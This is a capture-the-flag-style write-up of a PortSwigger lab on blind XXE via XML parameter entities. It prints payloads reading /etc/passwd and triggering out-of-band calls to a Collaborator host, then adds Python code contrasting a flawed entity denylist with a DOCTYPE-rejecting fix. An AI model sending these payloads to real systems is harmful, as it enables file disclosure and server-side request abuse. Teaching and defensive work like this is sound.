apsyleg · 1 min read
#portswigger #xxe #web-security
Blind XXE with OOB Interaction via XML Parameter Entities
Lab
Blind XXE with out-of-band interaction via XML parameter entities · Practitioner
Solution
Given
This lab has a "Check stock" feature that parses XML input, but does not display any unexpected values, and blocks requests containing regular external entities.
To solve the lab, use a parameter entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.
Analyzing the task
We need to use a parameter entity to make the XML parser send a request to our Burp Collaborator server.
Recon
We locate the stock-check endpoint. The request body is:
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>5</productId><storeId>1</storeId></stockCheck>
Out of curiosity, let's first try inserting a general external entity:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<stockCheck><productId>5&test;</productId><storeId>1</storeId></stockCheck>
"Entities are not allowed for security reasons"
Exploitation
The general entity is rejected, so we switch to a parameter entity, which the filter does not block:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "https://ne5p4zgdtmsrz8u7ig29c80bq2w0ku8j.oastify.com"> %xxe; ]>
<stockCheck><productId>5</productId><storeId>1</storeId></stockCheck>
Lab solved!
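The lab's weakness is a denylist that matches general external entities but not parameter entities. The following added example (my own code, not part of the original writeup or the lab) contrasts that flawed check with the robust fix: refusing any DOCTYPE before the tree is built, so neither entity form is ever processed. The three request bodies are constructed to mirror the ones above; the Collaborator hostname is replaced with the placeholder `collaborator.example.invalid`, and `naive_filter_allows` is a hypothetical reconstruction of the lab's behaviour, not its real code.

```python
import re
import xml.parsers.expat
from xml.etree import ElementTree as ET

# Constructed request bodies mirroring the three in the writeup.
BENIGN = b'''<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>5</productId><storeId>1</storeId></stockCheck>'''

GENERAL_ENTITY = b'''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<stockCheck><productId>5&test;</productId><storeId>1</storeId></stockCheck>'''

# Placeholder hostname instead of a real Collaborator/oastify address.
PARAM_ENTITY = b'''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "https://collaborator.example.invalid/"> %xxe; ]>
<stockCheck><productId>5</productId><storeId>1</storeId></stockCheck>'''


class EntitiesNotAllowed(ValueError):
    """Raised when a request body carries a DTD and could therefore define entities."""


# --- Flawed approach (hypothetical, modelled on what the lab appears to do) ----
# Matches "<!ENTITY name SYSTEM/PUBLIC ..." but not "<!ENTITY % name SYSTEM ...",
# because the first token after ENTITY must not start with '%'.
GENERAL_EXTERNAL_ENTITY = re.compile(rb"<!ENTITY\s+[^%\s]\S*\s+(SYSTEM|PUBLIC)\b", re.I)


def naive_filter_allows(body: bytes) -> bool:
    """Denylist that only recognises general external entities.

    Parameter entities slip through, which is exactly the gap the lab exploits."""
    return GENERAL_EXTERNAL_ENTITY.search(body) is None


# --- Robust approach: refuse any DOCTYPE before the tree is built --------------
def reject_dtd(body: bytes) -> None:
    """Abort parsing as soon as a DOCTYPE declaration appears.

    Without a DTD there is nowhere to declare an entity, general or parameter,
    so no entity-based XXE variant can reach the application."""
    parser = xml.parsers.expat.ParserCreate()
    # Belt and braces: even if a DOCTYPE were somehow reached, never expand
    # parameter entities (this setting is what the %xxe; reference depends on).
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise EntitiesNotAllowed(f"DOCTYPE declaration for <{name}> is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(body, True)


def parse_stock_check(body: bytes) -> tuple[int, int]:
    """Validate the body, then extract (productId, storeId) as integers."""
    reject_dtd(body)
    root = ET.fromstring(body)
    if root.tag != "stockCheck":
        raise ValueError("unexpected root element")
    return int(root.findtext("productId")), int(root.findtext("storeId"))


def accepted_by_hardened_parser(body: bytes) -> bool:
    """True if the hardened parser would process this body at all."""
    try:
        parse_stock_check(body)
        return True
    except EntitiesNotAllowed:
        return False


if __name__ == "__main__":
    for label, body in (("benign", BENIGN),
                        ("general entity", GENERAL_ENTITY),
                        ("parameter entity", PARAM_ENTITY)):
        print(f"{label:17s} naive filter: {'allow' if naive_filter_allows(body) else 'block':5s} "
              f"hardened parser: {'allow' if accepted_by_hardened_parser(body) else 'block'}")
```

Run as a script, the table shows the naive filter letting the parameter-entity body through while the hardened parser blocks both malicious bodies and still accepts the benign one. Expat, which ElementTree uses, does not fetch external entities unless a handler is installed, but rejecting the DOCTYPE outright is the policy to apply whatever parser sits behind the endpoint, since it removes the declaration mechanism rather than chasing individual entity forms.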